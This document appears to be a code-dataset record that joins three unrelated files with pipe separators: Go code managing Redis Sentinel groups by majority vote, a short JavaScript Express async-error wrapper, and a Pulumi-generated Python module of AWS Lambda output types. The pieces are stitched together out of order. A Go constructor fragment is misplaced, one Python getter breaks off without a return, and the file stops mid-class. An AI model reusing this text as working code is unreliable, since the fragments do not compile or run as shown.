func (s *Sentinel) errorf(err error, format string, args ...interface{}) {
if s.ErrFunc != nil {
s.ErrFunc(err, format, args...)
}
}
func (s *Sentinel) do(sentinel string, timeout time.Duration,
fn func(client *Client) error) error {
c, err := NewClientNoAuth(sentinel, timeout)
if err != nil {
return err
}
defer c.Close()
return fn(c)
}
func (s *Sentinel) dispatch(ctx context.Context, sentinel string, timeout time.Duration,
fn func(client *Client) error) error {
c, err := NewClientNoAuth(sentinel, timeout)
if err != nil {
return err
}
defer c.Close()
var exit = make(chan error, 1)
go func() {
exit <- fn(c)
}()
select {
case <-ctx.Done():
return errors.Trace(ctx.Err())
case err := <-exit:
return err
}
}
func (s *Sentinel) subscribeCommand(client *Client, sentinel string,
onSubscribed func()) error {
var channels = []interface{}{"+switch-master"}
if err := client.Flush("SUBSCRIBE", channels...); err != nil {
return errors.Trace(err)
}
for _, sub := range channels {
values, err := redigo.Values(client.Receive())
if err != nil {
return errors.Trace(err)
} else if len(values) != 3 {
return errors.Errorf("invalid response = %v", values)
}
s, err := redigo.Strings(values[:2], nil)
if err != nil || s[0] != "subscribe" || s[1] != sub.(string) {
return errors.Errorf("invalid response = %v", values)
}
}
onSubscribed()
for {
values, err := redigo.Values(client.Receive())
if err != nil {
return errors.Trace(err)
} else if len(values) < 2 {
return errors.Errorf("invalid response = %v", values)
}
message, err := redigo.Strings(values, nil)
if err != nil || message[0] != "message" {
return errors.Errorf("invalid response = %v", values)
}
s.printf("sentinel-[%s] subscribe event %v", sentinel, message)
switch message[1] {
case "+switch-master":
if len(message) != 3 {
return errors.Errorf("invalid response = %v", values)
}
var params = strings.SplitN(message[2], " ", 2)
if len(params) != 2 {
return errors.Errorf("invalid response = %v", values)
}
_, yes := s.isSameProduct(params[0])
if yes {
return nil
}
}
}
}
func (s *Sentinel) subscribeDispatch(ctx context.Context, sentinel string, timeout time.Duration,
onSubscribed func()) (bool, error) {
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
return s.subscribeCommand(c, sentinel, onSubscribed)
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled, context.DeadlineExceeded:
return false, nil
default:
return false, err
}
}
return true, nil
}
func (s *Sentinel) Subscribe(sentinels []string, timeout time.Duration, onMajoritySubscribed func()) bool {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
timeout += time.Second * 5
results := make(chan bool, len(sentinels))
var majority = 1 + len(sentinels)/2
var subscribed atomic2.Int64
for i := range sentinels {
go func(sentinel string) {
notified, err := s.subscribeDispatch(cntx, sentinel, timeout, func() {
if subscribed.Incr() == int64(majority) {
onMajoritySubscribed()
}
})
if err != nil {
s.errorf(err, "sentinel-[%s] subscribe failed", sentinel)
}
results <- notified
}(sentinels[i])
}
for alive := len(sentinels); ; alive-- {
if alive < majority {
if cntx.Err() == nil {
s.printf("sentinel subscribe lost majority (%d/%d)", alive, len(sentinels))
}
return false
}
select {
case <-cntx.Done():
if cntx.Err() != context.DeadlineExceeded {
s.printf("sentinel subscribe canceled (%v)", cntx.Err())
}
return false
case notified := <-results:
if notified {
s.printf("sentinel subscribe notified +switch-master")
return true
}
}
}
}
func (s *Sentinel) existsCommand(client *Client, name string) (bool, error) {
r, err := client.Do("SENTINEL", "get-master-addr-by-name", name)
if err != nil {
return false, errors.Trace(err)
}
return r != nil, nil
}
func (s *Sentinel) masterCommand(client *Client, name string) (map[string]string, error) {
if exists, err := s.existsCommand(client, name); err != nil {
return nil, err
} else if !exists {
return nil, nil
}
m, err := redigo.StringMap(client.Do("SENTINEL", "master", name))
if err != nil {
return nil, errors.Trace(err)
}
return m, nil
}
func (s *Sentinel) slavesCommand(client *Client, name string) ([]map[string]string, error) {
if exists, err := s.existsCommand(client, name); err != nil {
return nil, err
} else if !exists {
return nil, nil
}
values, err := redigo.Values(client.Do("SENTINEL", "slaves", name))
if err != nil {
return nil, errors.Trace(err)
}
var slaves []map[string]string
for i := range values {
m, err := redigo.StringMap(values[i], nil)
if err != nil {
return nil, errors.Trace(err)
}
slaves = append(slaves, m)
}
return slaves, nil
}
func (s *Sentinel) mastersCommand(client *Client) (map[int]map[string]string, error) {
values, err := redigo.Values(client.Do("SENTINEL", "masters"))
if err != nil {
return nil, errors.Trace(err)
}
var masters = make(map[int]map[string]string)
for i := range values {
m, err := redigo.StringMap(values[i], nil)
if err != nil {
return nil, errors.Trace(err)
}
gid, yes := s.isSameProduct(m["name"])
if yes {
masters[gid] = m
}
}
return masters, nil
}
func (s *Sentinel) mastersDispatch(ctx context.Context, sentinel string, timeout time.Duration) (map[int]*SentinelMaster, error) {
var masters = make(map[int]*SentinelMaster)
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
m, err := s.mastersCommand(c)
if err != nil {
return err
}
for gid, master := range m {
epoch, err := strconv.ParseInt(master["config-epoch"], 10, 64)
if err != nil {
s.printf("sentinel-[%s] masters parse %s failed, config-epoch = '%s', %s",
sentinel, master["name"], master["config-epoch"], err)
continue
}
var ip, port = master["ip"], master["port"]
if ip == "" || port == "" {
s.printf("sentinel-[%s] masters parse %s failed, ip:port = '%s:%s'",
sentinel, master["name"], ip, port)
continue
}
masters[gid] = &SentinelMaster{
Addr: net.JoinHostPort(ip, port),
Info: master, Epoch: epoch,
}
}
return nil
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled:
return nil, nil
default:
return nil, err
}
}
return masters, nil
}
type SentinelMaster struct {
Addr string
Info map[string]string
Epoch int64
}
func (s *Sentinel) Masters(sentinels []string, timeout time.Duration) (map[int]string, error) {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
timeout += time.Second * 5
results := make(chan map[int]*SentinelMaster, len(sentinels))
var majority = 1 + len(sentinels)/2
for i := range sentinels {
go func(sentinel string) {
masters, err := s.mastersDispatch(cntx, sentinel, timeout)
if err != nil {
s.errorf(err, "sentinel-[%s] masters failed", sentinel)
}
results <- masters
}(sentinels[i])
}
masters := make(map[int]string)
current := make(map[int]*SentinelMaster)
var voted int
for alive := len(sentinels); ; alive-- {
if alive == 0 {
switch {
case cntx.Err() != context.DeadlineExceeded && cntx.Err() != nil:
s.printf("sentinel masters canceled (%v)", cntx.Err())
return nil, errors.Trace(cntx.Err())
case voted != len(sentinels):
s.printf("sentinel masters voted = (%d/%d) masters = %d (%v)", voted, len(sentinels), len(masters), cntx.Err())
}
if voted < majority {
return nil, errors.Errorf("lost majority (%d/%d)", voted, len(sentinels))
}
return masters, nil
}
select {
case <-cntx.Done():
switch {
case cntx.Err() != context.DeadlineExceeded:
s.printf("sentinel masters canceled (%v)", cntx.Err())
return nil, errors.Trace(cntx.Err())
default:
s.printf("sentinel masters voted = (%d/%d) masters = %d (%v)", voted, len(sentinels), len(masters), cntx.Err())
}
if voted < majority {
return nil, errors.Errorf("lost majority (%d/%d)", voted, len(sentinels))
}
return masters, nil
case m := <-results:
if m == nil {
continue
}
for gid, master := range m {
if current[gid] == nil || current[gid].Epoch < master.Epoch {
current[gid] = master
masters[gid] = master.Addr
}
}
voted += 1
}
}
}
type MonitorConfig struct {
Quorum int
ParallelSyncs int
DownAfter time.Duration
FailoverTimeout time.Duration
NotificationScript string
ClientReconfigScript string
}
func (s *Sentinel) monitorGroupsCommand(client *Client, sentniel string, config *MonitorConfig, groups map[int]*net.TCPAddr) error {
for gid, tcpAddr := range groups {
var name = s.NodeName(gid)
if exists, err := s.existsCommand(client, name); err != nil {
return err
} else if exists {
_, err := client.Do("SENTINEL", "remove", name)
if err != nil {
return errors.Trace(err)
}
}
var ip, port = tcpAddr.IP.String(), tcpAddr.Port
_, err := client.Do("SENTINEL", "monitor", name, ip, port, config.Quorum)
if err != nil {
return errors.Trace(err)
} else {
var args = []interface{}{"set", name}
if config.ParallelSyncs != 0 {
args = append(args, "parallel-syncs", config.ParallelSyncs)
}
if config.DownAfter != 0 {
args = append(args, "down-after-milliseconds", int(config.DownAfter/time.Millisecond))
}
if config.FailoverTimeout != 0 {
args = append(args, "failover-timeout", int(config.FailoverTimeout/time.Millisecond))
}
if s.Auth != "" {
args = append(args, "auth-pass", s.Auth)
}
if config.NotificationScript != "" {
args = append(args, "notification-script", config.NotificationScript)
}
if config.ClientReconfigScript != "" {
args = append(args, "client-reconfig-script", config.ClientReconfigScript)
}
_, err := client.Do("SENTINEL", args...)
if err != nil {
return errors.Trace(err)
}
}
}
return nil
}
func (s *Sentinel) monitorGroupsDispatch(ctx context.Context, sentinel string, timeout time.Duration,
config *MonitorConfig, groups map[int]*net.TCPAddr) error {
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
return s.monitorGroupsCommand(c, sentinel, config, groups)
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled:
return nil
default:
return err
}
}
return nil
}
func (s *Sentinel) MonitorGroups(sentinels []string, timeout time.Duration, config *MonitorConfig, groups map[int]string) error {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
resolve := make(map[int]*net.TCPAddr)
var exit = make(chan error, 1)
go func() (err error) {
defer func() {
exit <- err
}()
for gid, addr := range groups {
if err := cntx.Err(); err != nil {
return errors.Trace(err)
}
tcpAddr, err := net.ResolveTCPAddr("tcp", addr)
if err != nil {
s.printf("sentinel monitor resolve tcp address of %s failed, %s", addr, err)
return errors.Trace(err)
}
resolve[gid] = tcpAddr
}
return nil
}()
select {
case <-cntx.Done():
if cntx.Err() != context.DeadlineExceeded {
s.printf("sentinel monitor canceled (%v)", cntx.Err())
} else {
s.printf("sentinel montior resolve tcp address (%v)", cntx.Err())
}
return errors.Trace(cntx.Err())
case err := <-exit:
if err != nil {
return err
}
}
timeout += time.Second * 5
results := make(chan error, len(sentinels))
for i := range sentinels {
go func(sentinel string) {
err := s.monitorGroupsDispatch(cntx, sentinel, timeout, config, resolve)
if err != nil {
s.errorf(err, "sentinel-[%s] monitor failed", sentinel)
}
results <- err
}(sentinels[i])
}
var last error
for _ = range sentinels {
select {
case <-cntx.Done():
if last != nil {
return last
}
return errors.Trace(cntx.Err())
case err := <-results:
if err != nil {
last = err
}
}
}
return last
}
func (s *Sentinel) removeGroupsCommand(client *Client, groups map[int]bool) error {
for gid := range groups {
var name = s.NodeName(gid)
if exists, err := s.existsCommand(client, name); err != nil {
return err
} else if exists {
_, err := client.Do("SENTINEL", "remove", name)
if err != nil {
return errors.Trace(err)
}
}
}
return nil
}
func (s *Sentinel) removeGroupsDispatch(ctx context.Context, sentinel string, timeout time.Duration,
groups map[int]bool) error {
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
return s.removeGroupsCommand(c, groups)
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled:
return nil
default:
return err
}
}
return nil
}
func (s *Sentinel) RemoveGroups(sentinels []string, timeout time.Duration, groups map[int]bool) error {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
timeout += time.Second * 5
results := make(chan error, len(sentinels))
for i := range sentinels {
go func(sentinel string) {
err := s.removeGroupsDispatch(cntx, sentinel, timeout, groups)
if err != nil {
s.errorf(err, "sentinel-[%s] remove failed", sentinel)
}
results <- err
}(sentinels[i])
}
var last error
for _ = range sentinels {
select {
case <-cntx.Done():
if last != nil {
return last
}
return errors.Trace(cntx.Err())
case err := <-results:
if err != nil {
last = err
}
}
}
return last
}
func (s *Sentinel) removeGroupsAllDispatch(ctx context.Context, sentinel string, timeout time.Duration) error {
var err = s.dispatch(ctx, sentinel, timeout, func(c *Client) error {
m, err := s.mastersCommand(c)
if err != nil {
return err
}
var groups = make(map[int]bool)
for gid := range m {
groups[gid] = true
}
return s.removeGroupsCommand(c, groups)
})
if err != nil {
switch errors.Cause(err) {
case context.Canceled:
return nil
default:
return err
}
}
return nil
}
func (s *Sentinel) RemoveGroupsAll(sentinels []string, timeout time.Duration) error {
cntx, cancel := context.WithTimeout(s.Context, timeout)
defer cancel()
timeout += time.Second * 5
results := make(chan error, len(sentinels))
for i := range sentinels {
go func(sentinel string) {
err := s.removeGroupsAllDispatch(cntx, sentinel, timeout)
if err != nil {
s.errorf(err, "sentinel-[%s] remove failed", sentinel)
}
results <- err
}(sentinels[i])
}
var last error
for _ = range sentinels {
select {
case <-cntx.Done():
if last != nil {
return last
}
return errors.Trace(cntx.Err())
case err := <-results:
if err != nil {
last = err
}
}
}
return last
}
type SentinelGroup struct {
Master map[string]string `json:"master"`
Slaves []map[string]string `json:"slaves,omitempty"`
}
func (s *Sentinel) MastersAndSlavesClient(client *Client) (map[string]*SentinelGroup, error) {
masters, err := s.mastersCommand(client)
if err != nil {
return nil, err
}
results := make(map[string]*SentinelGroup)
for _, master := range masters {
var name = master["name"]
slaves, err := s.slavesCommand(client, name)
if err != nil {
return nil, err
}
results[name] = &SentinelGroup{
Master: master, Slaves: slaves,
}
}
return results, nil
}
func (s *Sentinel) MastersAndSlaves(sentinel string, timeout time.Duration) (map[string]*SentinelGroup, error) {
var results map[string]*SentinelGroup
var err = s.do(sentinel, timeout, func(c *Client) error {
m, err := s.MastersAndSlavesClient(c)
if err != nil {
return err
}
results = m
return nil
})
if err != nil {
return nil, err
}
return results, nil
}
func (s *Sentinel) FlushConfig(sentinel string, timeout time.Duration) error {
return s.do(sentinel, timeout, func(c *Client) error {
_, err := c.Do("SENTINEL", "flushconfig")
if err != nil {
return err
}
return nil
})
}
| {
s := &Sentinel{Product: product, Auth: auth}
s.Context, s.Cancel = context.WithCancel(context.Background())
return s
} |
asyncController.js | const asyncController = (controllerPromise, options = {}) => { | return (req, res, next) => {
if (options.json) {
req.setjsonerror = true;
}
controllerPromise(req, res, next).catch(e => next(e));
};
};
module.exports = {
asyncController
}; | |
outputs.py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
__all__ = [
'AliasRoutingConfig',
'CodeSigningConfigAllowedPublishers',
'CodeSigningConfigPolicies',
'EventSourceMappingDestinationConfig',
'EventSourceMappingDestinationConfigOnFailure',
'FunctionDeadLetterConfig',
'FunctionEnvironment',
'FunctionEventInvokeConfigDestinationConfig',
'FunctionEventInvokeConfigDestinationConfigOnFailure',
'FunctionEventInvokeConfigDestinationConfigOnSuccess',
'FunctionFileSystemConfig',
'FunctionImageConfig',
'FunctionTracingConfig',
'FunctionVpcConfig',
'GetCodeSigningConfigAllowedPublisherResult',
'GetCodeSigningConfigPolicyResult',
'GetFunctionDeadLetterConfigResult',
'GetFunctionEnvironmentResult',
'GetFunctionFileSystemConfigResult',
'GetFunctionTracingConfigResult',
'GetFunctionVpcConfigResult',
]
@pulumi.output_type
class AliasRoutingConfig(dict):
def __init__(__self__, *,
additional_version_weights: Optional[Mapping[str, float]] = None):
"""
:param Mapping[str, float] additional_version_weights: A map that defines the proportion of events that should be sent to different versions of a lambda function.
"""
if additional_version_weights is not None:
pulumi.set(__self__, "additional_version_weights", additional_version_weights)
@property
@pulumi.getter(name="additionalVersionWeights")
def additional_version_weights(self) -> Optional[Mapping[str, float]]:
"""
A map that defines the proportion of events that should be sent to different versions of a lambda function.
"""
return pulumi.get(self, "additional_version_weights")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class CodeSigningConfigAllowedPublishers(dict):
def __init__(__self__, *,
signing_profile_version_arns: Sequence[str]):
"""
:param Sequence[str] signing_profile_version_arns: The Amazon Resource Name (ARN) for each of the signing profiles. A signing profile defines a trusted user who can sign a code package.
"""
pulumi.set(__self__, "signing_profile_version_arns", signing_profile_version_arns)
@property
@pulumi.getter(name="signingProfileVersionArns")
def signing_profile_version_arns(self) -> Sequence[str]:
"""
The Amazon Resource Name (ARN) for each of the signing profiles. A signing profile defines a trusted user who can sign a code package.
"""
return pulumi.get(self, "signing_profile_version_arns")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class CodeSigningConfigPolicies(dict):
def __init__(__self__, *,
untrusted_artifact_on_deployment: str):
"""
:param str untrusted_artifact_on_deployment: Code signing configuration policy for deployment validation failure. If you set the policy to Enforce, Lambda blocks the deployment request if code-signing validation checks fail. If you set the policy to Warn, Lambda allows the deployment and creates a CloudWatch log. Valid values: `Warn`, `Enforce`. Default value: `Warn`.
"""
pulumi.set(__self__, "untrusted_artifact_on_deployment", untrusted_artifact_on_deployment)
@property
@pulumi.getter(name="untrustedArtifactOnDeployment")
def untrusted_artifact_on_deployment(self) -> str:
"""
Code signing configuration policy for deployment validation failure. If you set the policy to Enforce, Lambda blocks the deployment request if code-signing validation checks fail. If you set the policy to Warn, Lambda allows the deployment and creates a CloudWatch log. Valid values: `Warn`, `Enforce`. Default value: `Warn`.
"""
return pulumi.get(self, "untrusted_artifact_on_deployment")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class EventSourceMappingDestinationConfig(dict):
def __init__(__self__, *,
on_failure: Optional['outputs.EventSourceMappingDestinationConfigOnFailure'] = None):
"""
:param 'EventSourceMappingDestinationConfigOnFailureArgs' on_failure: The destination configuration for failed invocations. Detailed below.
"""
if on_failure is not None:
pulumi.set(__self__, "on_failure", on_failure)
@property
@pulumi.getter(name="onFailure")
def on_failure(self) -> Optional['outputs.EventSourceMappingDestinationConfigOnFailure']:
"""
The destination configuration for failed invocations. Detailed below.
"""
return pulumi.get(self, "on_failure")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class EventSourceMappingDestinationConfigOnFailure(dict):
def __init__(__self__, *,
destination_arn: str):
"""
:param str destination_arn: The Amazon Resource Name (ARN) of the destination resource.
"""
pulumi.set(__self__, "destination_arn", destination_arn)
@property
@pulumi.getter(name="destinationArn")
def destination_arn(self) -> str:
"""
The Amazon Resource Name (ARN) of the destination resource.
"""
return pulumi.get(self, "destination_arn")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionDeadLetterConfig(dict):
def __init__(__self__, *,
target_arn: str):
"""
:param str target_arn: ARN of an SNS topic or SQS queue to notify when an invocation fails. If this option is used, the function's IAM role must be granted suitable access to write to the target object, which means allowing either the `sns:Publish` or `sqs:SendMessage` action on this ARN, depending on which service is targeted.
"""
pulumi.set(__self__, "target_arn", target_arn)
@property
@pulumi.getter(name="targetArn")
def target_arn(self) -> str:
"""
ARN of an SNS topic or SQS queue to notify when an invocation fails. If this option is used, the function's IAM role must be granted suitable access to write to the target object, which means allowing either the `sns:Publish` or `sqs:SendMessage` action on this ARN, depending on which service is targeted.
"""
return pulumi.get(self, "target_arn")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionEnvironment(dict):
def __init__(__self__, *,
variables: Optional[Mapping[str, str]] = None):
"""
:param Mapping[str, str] variables: Map of environment variables that are accessible from the function code during execution.
"""
if variables is not None:
pulumi.set(__self__, "variables", variables)
@property
@pulumi.getter
def variables(self) -> Optional[Mapping[str, str]]:
"""
Map of environment variables that are accessible from the function code during execution.
"""
return pulumi.get(self, "variables")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionEventInvokeConfigDestinationConfig(dict):
def __init__(__self__, *,
on_failure: Optional['outputs.FunctionEventInvokeConfigDestinationConfigOnFailure'] = None,
on_success: Optional['outputs.FunctionEventInvokeConfigDestinationConfigOnSuccess'] = None):
"""
:param 'FunctionEventInvokeConfigDestinationConfigOnFailureArgs' on_failure: Configuration block with destination configuration for failed asynchronous invocations. See below for details.
:param 'FunctionEventInvokeConfigDestinationConfigOnSuccessArgs' on_success: Configuration block with destination configuration for successful asynchronous invocations. See below for details.
"""
if on_failure is not None:
pulumi.set(__self__, "on_failure", on_failure)
if on_success is not None:
pulumi.set(__self__, "on_success", on_success)
@property
@pulumi.getter(name="onFailure")
def on_failure(self) -> Optional['outputs.FunctionEventInvokeConfigDestinationConfigOnFailure']:
"""
Configuration block with destination configuration for failed asynchronous invocations. See below for details.
"""
return pulumi.get(self, "on_failure")
@property
@pulumi.getter(name="onSuccess")
def on_success(self) -> Optional['outputs.FunctionEventInvokeConfigDestinationConfigOnSuccess']:
"""
Configuration block with destination configuration for successful asynchronous invocations. See below for details.
"""
return pulumi.get(self, "on_success")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionEventInvokeConfigDestinationConfigOnFailure(dict):
    """Destination used for failed asynchronous invocations."""
    def __init__(__self__, *,
                 destination: str):
        """
        :param str destination: Amazon Resource Name (ARN) of the destination resource. See the [Lambda Developer Guide](https://docs.aws.amazon.com/lambda/latest/dg/invocation-async.html#invocation-async-destinations) for acceptable resource types and associated IAM permissions.
        """
        pulumi.set(__self__, "destination", destination)
    @property
    @pulumi.getter
    def destination(self) -> str:
        """
        Amazon Resource Name (ARN) of the destination resource. See the [Lambda Developer Guide](https://docs.aws.amazon.com/lambda/latest/dg/invocation-async.html#invocation-async-destinations) for acceptable resource types and associated IAM permissions.
        """
        return pulumi.get(self, "destination")
    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case attribute names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionEventInvokeConfigDestinationConfigOnSuccess(dict):
    """Destination used for successful asynchronous invocations."""
    def __init__(__self__, *,
                 destination: str):
        """
        :param str destination: Amazon Resource Name (ARN) of the destination resource. See the [Lambda Developer Guide](https://docs.aws.amazon.com/lambda/latest/dg/invocation-async.html#invocation-async-destinations) for acceptable resource types and associated IAM permissions.
        """
        pulumi.set(__self__, "destination", destination)
    @property
    @pulumi.getter
    def destination(self) -> str:
        """
        Amazon Resource Name (ARN) of the destination resource. See the [Lambda Developer Guide](https://docs.aws.amazon.com/lambda/latest/dg/invocation-async.html#invocation-async-destinations) for acceptable resource types and associated IAM permissions.
        """
        return pulumi.get(self, "destination")
    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case attribute names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionFileSystemConfig(dict):
    """Amazon EFS file-system attachment for a Lambda function."""
    def __init__(__self__, *,
                 arn: str,
                 local_mount_path: str):
        """
        :param str arn: Amazon Resource Name (ARN) of the Amazon EFS Access Point that provides access to the file system.
        :param str local_mount_path: Path where the function can access the file system, starting with /mnt/.
        """
        pulumi.set(__self__, "arn", arn)
        pulumi.set(__self__, "local_mount_path", local_mount_path)
    @property
    @pulumi.getter
    def arn(self) -> str:
        """
        Amazon Resource Name (ARN) of the Amazon EFS Access Point that provides access to the file system.
        """
        return pulumi.get(self, "arn")
    @property
    @pulumi.getter(name="localMountPath")
    def local_mount_path(self) -> str:
        """
        Path where the function can access the file system, starting with /mnt/.
        """
        return pulumi.get(self, "local_mount_path")
    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case attribute names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionImageConfig(dict):
    """Container-image configuration overrides for a Lambda function
    (command, entry point and working directory)."""
    def __init__(__self__, *,
                 commands: Optional[Sequence[str]] = None,
                 entry_points: Optional[Sequence[str]] = None,
                 working_directory: Optional[str] = None):
        """
        :param Sequence[str] commands: Parameters that you want to pass in with `entry_point`.
        :param Sequence[str] entry_points: Entry point to your application, which is typically the location of the runtime executable.
        :param str working_directory: Working directory.
        """
        if commands is not None:
            pulumi.set(__self__, "commands", commands)
        if entry_points is not None:
            pulumi.set(__self__, "entry_points", entry_points)
        if working_directory is not None:
            pulumi.set(__self__, "working_directory", working_directory)
    @property
    @pulumi.getter
    def commands(self) -> Optional[Sequence[str]]:
        """
        Parameters that you want to pass in with `entry_point`.
        """
        return pulumi.get(self, "commands")
    @property
    @pulumi.getter(name="entryPoints")
    def entry_points(self) -> Optional[Sequence[str]]:
        """
        Entry point to your application, which is typically the location of the runtime executable.
        """
        return pulumi.get(self, "entry_points")
    @property
    @pulumi.getter(name="workingDirectory")
    def working_directory(self) -> Optional[str]:
        """
        Working directory.
        """
        return pulumi.get(self, "working_directory")
    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case attribute names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionTracingConfig(dict):
    """AWS X-Ray tracing configuration for a Lambda function."""
    def __init__(__self__, *,
                 mode: str):
        """
        :param str mode: Whether to sample and trace a subset of incoming requests with AWS X-Ray. Valid values are `PassThrough` and `Active`. If `PassThrough`, Lambda will only trace the request from an upstream service if it contains a tracing header with "sampled=1". If `Active`, Lambda will respect any tracing header it receives from an upstream service. If no tracing header is received, Lambda will call X-Ray for a tracing decision.
        """
        pulumi.set(__self__, "mode", mode)
    @property
    @pulumi.getter
    def mode(self) -> str:
        """
        Whether to sample and trace a subset of incoming requests with AWS X-Ray. Valid values are `PassThrough` and `Active`. If `PassThrough`, Lambda will only trace the request from an upstream service if it contains a tracing header with "sampled=1". If `Active`, Lambda will respect any tracing header it receives from an upstream service. If no tracing header is received, Lambda will call X-Ray for a tracing decision.
        """
        return pulumi.get(self, "mode")
    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case attribute names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class FunctionVpcConfig(dict):
    """VPC attachment (subnets and security groups) for a Lambda function."""
    def __init__(__self__, *,
                 security_group_ids: Sequence[str],
                 subnet_ids: Sequence[str],
                 vpc_id: Optional[str] = None):
        """
        :param Sequence[str] security_group_ids: List of security group IDs associated with the Lambda function.
        :param Sequence[str] subnet_ids: List of subnet IDs associated with the Lambda function.
        :param str vpc_id: ID of the VPC associated with the Lambda function.
        """
        pulumi.set(__self__, "security_group_ids", security_group_ids)
        pulumi.set(__self__, "subnet_ids", subnet_ids)
        if vpc_id is not None:
            pulumi.set(__self__, "vpc_id", vpc_id)
    @property
    @pulumi.getter(name="securityGroupIds")
    def security_group_ids(self) -> Sequence[str]:
        """
        List of security group IDs associated with the Lambda function.
        """
        return pulumi.get(self, "security_group_ids")
    @property
    @pulumi.getter(name="subnetIds")
    def subnet_ids(self) -> Sequence[str]:
        """
        List of subnet IDs associated with the Lambda function.
        """
        return pulumi.get(self, "subnet_ids")
    @property
    @pulumi.getter(name="vpcId")
    def vpc_id(self) -> Optional[str]:
        """
        ID of the VPC associated with the Lambda function.
        """
        return pulumi.get(self, "vpc_id")
    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case attribute names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class GetCodeSigningConfigAllowedPublisherResult(dict):
    """Allowed-publishers block returned by the code signing config data source."""
    def __init__(__self__, *,
                 signing_profile_version_arns: Sequence[str]):
        """
        :param Sequence[str] signing_profile_version_arns: The Amazon Resource Name (ARN) for each of the signing profiles. A signing profile defines a trusted user who can sign a code package.
        """
        pulumi.set(__self__, "signing_profile_version_arns", signing_profile_version_arns)
    @property
    @pulumi.getter(name="signingProfileVersionArns")
    def signing_profile_version_arns(self) -> Sequence[str]:
        """
        The Amazon Resource Name (ARN) for each of the signing profiles. A signing profile defines a trusted user who can sign a code package.
        """
        return pulumi.get(self, "signing_profile_version_arns")
@pulumi.output_type
class GetCodeSigningConfigPolicyResult(dict):
def __init__(__self__, *,
untrusted_artifact_on_deployment: str):
"""
:param str untrusted_artifact_on_deployment: Code signing configuration policy for deployment validation failure.
"""
pulumi.set(__self__, "untrusted_artifact_on_deployment", untrusted_artifact_on_deployment)
@property
@pulumi.getter(name="untrustedArtifactOnDeployment")
def untrusted_artifact_on_deployment(self) -> str:
"""
Code signing configuration policy for deployment validation failure.
""" |
@pulumi.output_type
class GetFunctionDeadLetterConfigResult(dict):
    """Dead-letter configuration reported by the function data source."""
    def __init__(__self__, *,
                 target_arn: str):
        """
        :param str target_arn: ARN of the dead-letter target (presumably an SQS queue or SNS topic — confirm against provider docs).
        """
        pulumi.set(__self__, "target_arn", target_arn)
    @property
    @pulumi.getter(name="targetArn")
    def target_arn(self) -> str:
        """
        ARN of the dead-letter target.
        """
        return pulumi.get(self, "target_arn")
@pulumi.output_type
class GetFunctionEnvironmentResult(dict):
    """Environment block reported by the function data source."""
    def __init__(__self__, *,
                 variables: Mapping[str, str]):
        """
        :param Mapping[str, str] variables: Map of environment variable names to values.
        """
        pulumi.set(__self__, "variables", variables)
    @property
    @pulumi.getter
    def variables(self) -> Mapping[str, str]:
        """
        Map of environment variable names to values.
        """
        return pulumi.get(self, "variables")
@pulumi.output_type
class GetFunctionFileSystemConfigResult(dict):
    """File-system (EFS) attachment reported by the function data source."""
    def __init__(__self__, *,
                 arn: str,
                 local_mount_path: str):
        """
        :param str arn: Unqualified (no `:QUALIFIER` or `:VERSION` suffix) Amazon Resource Name (ARN) identifying your Lambda Function. See also `qualified_arn`.
        """
        # NOTE(review): the `arn` docstring above looks copied from the
        # function-level attribute; for a file system config this is
        # presumably the EFS access point ARN — confirm against provider docs.
        pulumi.set(__self__, "arn", arn)
        pulumi.set(__self__, "local_mount_path", local_mount_path)
    @property
    @pulumi.getter
    def arn(self) -> str:
        """
        Unqualified (no `:QUALIFIER` or `:VERSION` suffix) Amazon Resource Name (ARN) identifying your Lambda Function. See also `qualified_arn`.
        """
        return pulumi.get(self, "arn")
    @property
    @pulumi.getter(name="localMountPath")
